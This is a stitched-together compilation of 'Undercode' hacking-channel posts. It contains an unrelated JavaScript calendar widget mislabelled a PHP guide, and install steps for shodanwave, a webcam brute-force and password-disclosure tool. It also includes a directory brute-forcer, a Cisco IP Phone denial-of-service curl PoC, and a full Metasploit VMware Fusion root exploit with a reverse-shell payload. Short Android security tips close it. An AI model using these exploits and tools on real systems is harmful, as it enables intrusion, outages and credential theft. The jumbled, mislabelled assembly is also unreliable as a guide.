▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Forward something Php guide by Undercode :
twitter.com/undercodeNews

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :


<style type="text/css">
body {
background-color: #D4D0C8;
}
.m_fieldset {
padding: 0,10,5,10;
text-align: center;
width: 150px;
}
.m_legend {
font-family: Tahoma;
font-size: 11px;
padding-bottom: 5px;
}
.m_frameborder {
border-left: 2px inset #D4D0C8;
border-top: 2px inset #D4D0C8;
border-right: 2px inset #FFFFFF;
border-bottom: 2px inset #FFFFFF;
width: 100px;
height: 19px;
background-color: #FFFFFF;
overflow: hidden;
text-align: right;
font-family: "Tahoma";
font-size: 10px;
}
.m_arrow {
width: 16px;
height: 8px;
font-family: "Webdings";
font-size: 7px;
line-height: 2px;
padding-left: 2px;
cursor: default;
}
.m_input {
width: 18px;
height: 14px;
border: 0px solid black;
font-family: "Tahoma";
font-size: 9px;
text-align: right;
ime-mode:disabled;
}
</style>

<script language="javascript">
// Written by cloudchen, 2004/03/15
function minute(name,fName)
{
this.name = name;
this.fName = fName || "m_input";
this.timer = null;
this.fObj = null;

this.toString = function()
{
var objDate = new Date();
var sMinute_Common = "class=\"m_input\" maxlength=\"2\" name=\""+this.fName+"\" onfocus=\""+this.name+".setFocusObj(this)\" onblur=\""+this.name+".setTime(this)\" onkeyup=\""+this.name+".prevent(this)\" onkeypress=\"if (!/[0-9]/.test(String.fromCharCode(event.keyCode)))event.keyCode=0\" onpaste=\"return false\" ondragenter=\"return false\"";
var sButton_Common = "class=\"m_arrow\" onfocus=\"this.blur()\" onmouseup=\""+this.name+".controlTime()\" disabled"
var str = "";
str += "<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\">"
str += "<tr>"
str += "<td>"
str += "<div class=\"m_frameborder\">"
str += "<input radix=\"24\" value=\""+this.formatTime(objDate.getHours())+"\" "+sMinute_Common+">:"
str += "<input radix=\"60\" value=\""+this.formatTime(objDate.getMinutes())+"\" "+sMinute_Common+">:"
str += "<input radix=\"60\" value=\""+this.formatTime(objDate.getSeconds())+"\" "+sMinute_Common+">"
str += "</div>"
str += "</td>"
str += "<td>"
str += "<table border=\"0\" cellspacing=\"2\" cellpadding=\"0\">"
str += "<tr><td><button id=\""+this.fName+"_up\" "+sButton_Common+">5</button></td></tr>"
str += "<tr><td><button id=\""+this.fName+"_down\" "+sButton_Common+">6</button></td></tr>"
str += "</table>"
str += "</td>"
str += "</tr>"
str += "</table>"
return str;
}
this.play = function()
{
this.timer = setInterval(this.name+".playback()",1000);
}
this.formatTime = function(sTime)
{
sTime = ("0"+sTime);
return sTime.substr(sTime.length-2);
}
this.playback = function()
{
var objDate = new Date();
var arrDate = [objDate.getHours(),objDate.getMinutes(),objDate.getSeconds()];
var objMinute = document.getElementsByName(this.fName);
for (var i=0;i<objMinute.length;i++)
{
objMinute[i].value = this.formatTime(arrDate[i])
}
}
this.prevent = function(obj)
{
clearInterval(this.timer);
this.setFocusObj(obj);
var value = parseInt(obj.value,10);
var radix = parseInt(obj.radix,10)-1;
if (obj.value>radix||obj.value<0)
{
obj.value = obj.value.substr(0,1);
}
}
this.controlTime = function(cmd)
{
event.cancelBubble = true;
if (!this.fObj) return;
clearInterval(this.timer);
var cmd = event.srcElement.innerText=="5"?true:false;
var i = parseInt(this.fObj.value,10);
var radix = parseInt(this.fObj.radix,10)-1;
if (i==radix&&cmd)
{
i = 0;
}
else if (i==0&&!cmd)
{
i = radix;
}
else
{
cmd?i++:i--;
}
this.fObj.value = this.formatTime(i);
this.fObj.select();
}
this.setTime = function(obj)
{
obj.value = this.formatTime(obj.value);
}
this.setFocusObj = function(obj)
{
eval(this.fName+"_up").disabled = eval(this.fName+"_down").disabled = false;
this.fObj = obj;
}
this.getTime = function()
{
var arrTime = new Array(2);
for (var i=0;i<document.getElementsByName(this.fName).length;i++)
{
arrTime[i] = document.getElementsByName(this.fName)[i].value;
}
return arrTime.join(":");
}
}
</script>

<style type="text/css">
body {
background-color: #D4D0C8;
}
.c_fieldset {
padding: 0,10,5,10;
text-align: center;
width: 180px;
}
.c_legend {
font-family: Tahoma;
font-size: 11px;
padding-bottom: 5px;
}
.c_frameborder {
border-left: 2px inset #D4D0C8;
border-top: 2px inset #D4D0C8;
border-right: 2px inset #FFFFFF;
border-bottom: 2px inset #FFFFFF;
background-color: #FFFFFF;
overflow: hidden;
font-family: "Tahoma";
font-size: 10px;
width:160px;
height:120px;
}
.c_frameborder td {
width: 23px;
height: 16px;
font-family: "Tahoma";
font-size: 11px;
text-align: center;
cursor: default;
}
.c_frameborder .selected {
background-color:#0A246A;
width:12px;
height:12px;
color:white;
}
.c_frameborder span {
width:12px;
height:12px;
}
.c_arrow {
width: 16px;
height: 8px;
font-family: "Webdings";
font-size: 7px;
line-height: 2px;
padding-left: 2px;
cursor: default;
}
.c_year {
font-family: "Tahoma";
font-size: 11px;
cursor: default;
width:55px;
height:19px;
}
.c_month {
width:75px;
height:20px;
font:11px "Tahoma";
}
.c_dateHead {
background-color:#808080;
color:#D4D0C8;
}
</style>

<script language="javascript">
// Written by cloudchen, 2004/03/16
function calendar(name,fName)
{
this.name = name;
this.fName = fName || "calendar";
this.year = new Date().getFullYear();
this.month = new Date().getMonth();
this.date = new Date().getDate();
//private
this.toString = function()
{
var str = "";
str += "<table border=\"0\" cellspacing=\"3\" cellpadding=\"0\" onselectstart=\"return false\">";
str += "<tr>";
str += "<td>";
str += this.drawMonth();
str += "</td>";
str += "<td align=\"right\">";
str += this.drawYear();
str += "</td>";
str += "</tr>";
str += "<tr>";
str += "<td colspan=\"2\">";
str += "<div class=\"c_frameborder\">";
str += "<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" class=\"c_dateHead\">";
str += "<tr>";
str += "<td>日</td><td>一</td><td>二</td><td>三</td><td>四</td><td>五</td><td>六</td>";
str += "</tr>";
str += "</table>";
str += this.drawDate();
str += "</div>";
str += "</td>";
str += "</tr>";
str += "</table>";
return str;
}
//private
this.drawYear = function()
{
var str = "";
str += "<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\">";
str += "<tr>";
str += "<td>";
str += "<input class=\"c_year\" maxlength=\"4\" value=\""+this.year+"\" name=\""+this.fName+"\" id=\""+this.fName+"_year\" readonly>";
//DateField
str += "<input type=\"hidden\" name=\""+this.fName+"\" value=\""+this.date+"\" id=\""+this.fName+"_date\">";
str += "</td>";
str += "<td>";
str += "<table cellspacing=\"2\" cellpadding=\"0\" border=\"0\">";
str += "<tr>";
str += "<td><button class=\"c_arrow\" onfocus=\"this.blur()\" onclick=\"event.cancelBubble=true;document.getElementById('"+this.fName+"_year').value++;"+this.name+".redrawDate()\">5</button></td>";
str += "</tr>";
str += "<tr>";
str += "<td><button class=\"c_arrow\" onfocus=\"this.blur()\" onclick=\"event.cancelBubble=true;document.getElementById('"+this.fName+"_year').value--;"+this.name+".redrawDate()\">6</button></td>";
str += "</tr>";
str += "</table>";
str += "</td>";
str += "</tr>";
str += "</table>";
return str;
}
//priavate
this.drawMonth = function()
{
var aMonthName = ["一","二","三","四","五","六","七","八","九","十","十一","十二"];
var str = "";
str += "<select class=\"c_month\" name=\""+this.fName+"\" id=\""+this.fName+"_month\" onchange=\""+this.name+".redrawDate()\">";
for (var i=0;i<aMonthName.length;i++) {
str += "<option value=\""+(i+1)+"\" "+(i==this.month?"selected":"")+">"+aMonthName[i]+"月</option>";
}
str += "</select>";
return str;
}
//private
this.drawDate = function()
{
var str = "";
var fDay = new Date(this.year,this.month,1).getDay();
var fDate = 1-fDay;
var lDay = new Date(this.year,this.month+1,0).getDay();
var lDate = new Date(this.year,this.month+1,0).getDate();
str += "<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" id=\""+this.fName+"_dateTable"+"\">";
for (var i=1,j=fDate;i<7;i++)
{
str += "<tr>";
for (var k=0;k<7;k++)
{

str += "<td><span"+(j==this.date?" class=\"selected\"":"")+" onclick=\""+this.name+".redrawDate(this.innerText)\">"+(isDate(j++))+"</span></td>";
}
str += "</tr>";
}
str += "</table>";
return str;

function isDate(n)
{
return (n>=1&&n<=lDate)?n:"";
}
}
//public
this.redrawDate = function(d)
{
this.year = document.getElementById(this.fName+"_year").value;
this.month = document.getElementById(this.fName+"_month").value-1;
this.date = d || this.date;
document.getElementById(this.fName+"_year").value = this.year;
document.getElementById(this.fName+"_month").selectedIndex = this.month;
document.getElementById(this.fName+"_date").value = this.date;
if (this.date>new Date(this.year,this.month+1,0).getDate()) this.date = new Date(this.year,this.month+1,0).getDate();
document.getElementById(this.fName+"_dateTable").outerHTML = this.drawDate();
}
//public
this.getDate = function(delimiter)
{
if (!delimiter) delimiter = "/";
var aValue = [this.year,(this.month+1),this.date];
return aValue.join(delimiter);
}
}
</script>
<table border="0">
<tr><td>
<fieldset class="c_fieldset"><legend class="c_legend">日期(T)</legend>
<script>
var c = new calendar("c");
document.write(c);
</script>

</fieldset>
</td>
<td valign="top">
<fieldset class="m_fieldset"><legend class = "m_legend"> Time (T) </ legend> var m = new minute ("m"); <script>
><!-Call Time


m.play();
document.write(m);
</script>
</fieldset>
</td></tr>
<tr>
<td colspan="2">
<button onclick="alert(c.getDate())" style="font:8px Webdings;width:15px;height:15px;line-height:6px;">4</button>
<button style="font:10px Arial;height:15px;height:16px;border:0px;" onfocus="this.blur()">GetDate</button>

<button onclick="alert(m.getTime())" style="font:8px Webdings;width:15px;height:15px;line-height:6px;">4</button>
<button style="font:10px Arial;height:15px;height:16px;border:0px;" onfocus="this.blur()">GetTime</button>

Written by Undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Those php guide by undercode is gpood for now let s send some termux-linux tips & some accounts

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Exploite Old webcam

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

What does the tool to? Look, a list!

> Search

> Brute force

> SSID and WPAPSK Password Disclosure

> E-mail, FTP, DNS, MSN Password Disclosure

> Exploit

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

cd /opt/

$ git clone https://github.com/fbctf/shodanwave.git

$ cd shodanwave

$ pip install -r requirements.txt

Usage: python shodanwave.py -u usernames.txt -w passwords.txt -k
Shodan API key --t OUTPUT

python shodanwave.py --help

🦑Modify your Tsocks config!!

Add/Modify the following at the bottom:
server =
server_type = <4 or 5>
server_port =
default_pass = (Might be required for proxy)

@undercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Easy way to brute-force web directory.


🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :


1) git clone https://github.com/abaykan/crawlbox.git

2) cd crawlbox/

3) pip install -r requirements.txt

python crawlbox.py -h
url specific target url, like domain.com
optional arguments:

-h, --help show this help message and exit
-v, --version show program's version number and exit
-w WORDLIST specific path to wordlist file
-d DELAY add delay between requests

🦑MacOSX
Kali Linux
Ubuntu 16.04

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑# Exploit Title: Cisco IP Phone 11.7 TESTED BY UNDERCODE ‼️


- Denial of Service (PoC)
# Date: 2020-04-15
# Exploit Author: Jacob Baines
# Vendor Homepage: https://www.cisco.com
# Software Link: https://www.cisco.com/c/en/us/products/collaboration-endpoints/ip-phones/index.html
# Version: Before 11.7(1)
# Tested on: Cisco Wireless IP Phone 8821
# CVE: CVE-2020-3161
# Cisco Advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs
# Researcher Advisory: https://www.tenable.com/security/research/tra-2020-24

curl -v --path-as-is --insecure
https://phone_address/deviceconfig/setActivationCode?params=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

@undercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑VMWARE 2020 EXPLOIT TESTED BY UNDERCODE :
AVAIBLE AT DEEPWEB & EXPLOITE DB :


🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Post::OSX::Priv
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

def initialize(info = {})
super(
update_info(
info,
'Name' => 'VMware Fusion USB Arbitrator Setuid Privilege Escalation',
'Description' => %q(
This exploits an improper use of setuid binaries within VMware Fusion 10.1.3 - 11.5.3.
The Open VMware USB Arbitrator Service can be launched outide of its standard path
which allows loading of an attacker controlled binary. By creating a payload in the
user home directory in a specific folder, and creating a hard link to the 'Open VMware
USB Arbitrator Service' binary, we're able to launch it temporarily to start our payload
with an effective UID of 0.
discovered an incomplete patch in 11.5.3 with a TOCTOU race.
Successfully tested against 10.1.6, 11.5.1, 11.5.2, and 11.5.3.
),
'License' => MSF_LICENSE,
'Author' =>
[
'h00die', # msf module
'Dhanesh Kizhakkinan', # discovery
'Rich Mirch', # edb module
'jeffball <jeffball@dc949.org>', # 11.5.3 exploit
'grimm'
],
'Platform' => [ 'osx' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [[ 'Auto', {} ]],
'Privileged' => true,
'References' =>
[
[ 'CVE', '2020-3950' ],
[ 'EDB', '48235' ],
[ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0005.html' ],
[ 'URL', 'https://twitter.com/jeffball55/status/1242530508053110785?s=20' ],
[ 'URL', 'https://github.com/grimm-co/NotQuite0DayFriday/blob/master/2020.03.17-vmware-fusion/notes.txt' ]
],
'DisclosureDate' => 'Mar 17 2020',
'DefaultOptions' =>
{
'PAYLOAD' => 'osx/x64/meterpreter_reverse_tcp',
'WfsDelay' => 15
}
)
)

register_options [
OptInt.new('MAXATTEMPTS', [true, 'Maximum attempts to win race for 11.5.3', 75])
]

register_advanced_options [
OptBool.new('ForceExploit', [false, 'Override check result', false])
]
end

def open_usb_service
'Open VMware USB Arbitrator Service'
end

def usb_service
'VMware USB Arbitrator Service'
end

def get_home_dir
home = cmd_exec 'echo ~'
if home.blank?
fail_with Failure::BadConfig, 'Unable to determine home dir for shell.'
end
home
end

def content_dir
"#{get_home_dir}/Contents"
end

def base_dir
"#{content_dir}/Library/services/"
end

def kill_process(executable)
pid_kill = cmd_exec %(ps ax | grep #{executable} | grep -v grep | awk '{print "kill -9 " $1}')
cmd_exec pid_kill
end

def get_version
# Thanks to @ddouhine on github for this answer!
version_raw = cmd_exec "plutil -p '/Applications/VMware Fusion.app/Contents/Info.plist' | grep CFBundleShortVersionString"
/=> "(?<version>\d{0,2}\.\d{0,2}\.\d{0,2})"/ =~ version_raw #supposed 11.x is also vulnerable, but everyone whos tested shows 11.5.1 or 11.5.2
if version_raw.blank?
fail_with Failure::BadConfig, 'Unable to determine VMware Fusion version. Set ForceExploit to override.'
end
Gem::Version.new(version)
end

def pre_11_5_3
# Upload payload executable & chmod
payload_filename = "#{base_dir}#{usb_service}"
print_status "Uploading Payload: #{payload_filename}"
write_file payload_filename, generate_payload_exe
chmod payload_filename, 0o755
register_file_for_cleanup payload_filename

# create folder structure and hard link to the original binary
root_link_folder = "#{get_home_dir}/#{rand_text_alphanumeric(2..5)}" # for cleanup later
link_folder = "#{root_link_folder}/#{rand_text_alphanumeric(2..5)}/#{rand_text_alphanumeric(2..5)}/"
cmd_exec "mkdir -p #{link_folder}"
cmd_exec "ln '/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}' '#{link_folder}#{open_usb_service}'"
print_status "Created folder (#{link_folder}) and link"

print_status 'Starting USB Service (5 sec pause)'
# XXX: The ; used by cmd_exec will interfere with &, so pad it with :
cmd_exec "cd #{link_folder}; '#{link_folder}/#{open_usb_service}' & :"
Rex.sleep 5 # give time for the service to execute our payload
print_status 'Killing service'
cmd_exec "pkill '#{open_usb_service}'"
print_status "Deleting #{root_link_folder}"
rm_rf root_link_folder
end

def exactly_11_5_3
# Upload payload executable & chmod
payload_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
print_status "Uploading Payload to #{payload_name}"
write_file payload_name, generate_payload_exe
chmod payload_name, 0o755
#create race with codesign check
root_link_folder = "#{get_home_dir}/#{rand_text_alphanumeric(2..5)}" # for cleanup later
link_folder = "#{root_link_folder}/#{rand_text_alphanumeric(2..5)}/#{rand_text_alphanumeric(2..5)}/"
print_status 'Uploading race condition executable.'
race = <<~EOF
#!/bin/sh
while [ "1" = "1" ]; do
ln -f '/Applications/VMware Fusion.app/Contents/Library/services/#{usb_service}' '#{base_dir}#{usb_service}'
ln -f '#{payload_name}' '#{base_dir}#{usb_service}'
done
EOF
racer_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
upload_and_chmodx racer_name, race
register_file_for_cleanup racer_name
register_dirs_for_cleanup root_link_folder
# create the hard link
print_status "Creating folder (#{link_folder}) and link"
cmd_exec "mkdir -p #{link_folder}"
cmd_exec "ln '/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}' '#{link_folder}#{open_usb_service}'"

# create the launcher to start the racer and keep launching our service to attempt to win
launcher = <<~EOF
#!/bin/sh
#{racer_name} &
for i in {1..#{datastore['MAXATTEMPTS']}}
do
echo "attempt $i";
'#{link_folder}#{open_usb_service}'
done
EOF
runner_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
upload_and_chmodx runner_name, launcher
register_file_for_cleanup runner_name

print_status "Launching Exploit #{runner_name} (sleeping 15sec)"
# XXX: The ; used by cmd_exec will interfere with &, so pad it with :
results = cmd_exec "#{runner_name} & :"
Rex.sleep 15 # give time for the service to execute our payload
vprint_status results

print_status 'Exploit Finished, killing scripts.'
kill_process racer_name
kill_process runner_name # in theory should be killed already but just in case
kill_process "'#{link_folder}#{open_usb_service}'"
# kill_process 'ln' a rogue ln -f may mess us up, but killing them seemed to be unreliable and mark the exploit as failed.
# above caused: [-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Unknown error
# rm_rf base_dir # this always fails. Leaving it here as a note that when things dont kill well, can't delete the folder
end

def check
unless exists? "/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}"
print_bad "'#{open_usb_service}' binary missing"
return CheckCode::Safe
end
version = get_version
if version.between?(Gem::Version.new('10.1.3'), Gem::Version.new('11.5.3'))
vprint_good "Vmware Fusion #{version} is exploitable"
else
print_bad "VMware Fusion #{version} is NOT exploitable"
return CheckCode::Safe
end
CheckCode::Appears
end

def exploit
# First check the system is vulnerable, or the user wants to run regardless
unless check == CheckCode::Appears
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end

# Check if we're already root
if is_root?
unless datastore['ForceExploit']
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
end
end

# Make sure we can write our payload to the remote system
rm_rf content_dir # live dangerously.
if directory? content_dir
fail_with Filure::BadConfig, "#{content_dir} exists. Unable to delete automatically. Please delete or exploit will fail."
end
cmd_exec "mkdir -p #{base_dir}"
register_dirs_for_cleanup content_dir
unless writable? base_dir
fail_with Failure::BadConfig, "#{base_dir} is not writable."
end

version = get_version
if version == Gem::Version.new('11.5.3')
vprint_status 'Using 11.5.3 exploit'
exactly_11_5_3
elsif version.between?(Gem::Version.new('10.1.3'), Gem::Version.new('11.5.2'))
vprint_status 'Using pre-11.5.3 exploit'
pre_11_5_3
end
rm_rf content_dir # live dangerously.
end
end

🦑TESTED BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 VMWARE EXPLOIT TESTED BY UNDERCODE

Undercode is ready to start training in leb after corona situations, :)

🦑 ANDROID HACKING & SECURITY TUTORIALS BY UNDERCODE

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Android Popular surface adjustments or hacks :
instagram.com/undercodeTesting

> developers use several popular applications to hack Android devices to make them faster, extend battery life, and customize screen savers, ringtones, alerts, and more.

> The list of hackers that can be used to improve Android is large and growing every day. Depending on what the hacker can do, the adjustment or hacking can be superficial or the type of hacking system.

🦑 Popular surface adjustments or hacks are:

1) Tusker-for location-based automation
Ability to install custom keyboards such as Swype and SwiftKey

2) Deep system adjustments include downloading new cores and radios to increase speed and battery life
Unfortunately, there are many hackers with malicious intent that can and do invade Android devices to steal valuable personal information or profit from illegal financial transactions.

> Although it may be difficult (or even impossible) to make your Android unattackable, you can take some measures to improve the security of your device.

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Three major hacking threats to Android by undercode :


1) Data in transit: Android devices and mobile devices are often particularly vulnerable because they only use wireless communication and often use public WiFi, which may be unsafe. The attack often used by hackers is a man-in-the-middle attack.

> The attacker breaks into the device and redirects the data to use the resources on it, and then forwards it to the original target. This method allows hackers to monitor Internet browsing activity, steal keystrokes to identify passwords and isolate individuals' physical locations, and possibly listen to calls and block text.

2) Third-party apps: In a recent study, 57% of malicious apps in the Android market were found in third-party app stores.

3) SMS Trojan Horse: By including advanced dialing features in the Trojan Horse application, an attacker can run the victim's phone bill and have the mobile operator collect and distribute funds to them. Another malicious use of SMS involves using an infected device to send SMS text messages to all contacts in the address book, which contains links that trick the recipient to download and install the worm, infecting many devices at once.

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 You can take three steps to protect your Android device :


1) SSL encryption of the device: SSL is one of the best ways to protect sensitive data in transit.

2) Test third-party apps: Try to install apps from first-party vendors such as Google. If you do purchase the application from a third-party store, please use the mobile security vendor to audit the security / authenticity of any third-party code / library used in the mobile application. Read the permissions required by the application before downloading. Examples of applications that a permission application can request may trigger red flags are permission to disclose your identity or location or send mail to the Internet.

3) Be wary of SMS Trojan horses: implement control measures to prevent unauthorized access to paid resources. If you request payment via SMS, please proceed with caution.

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁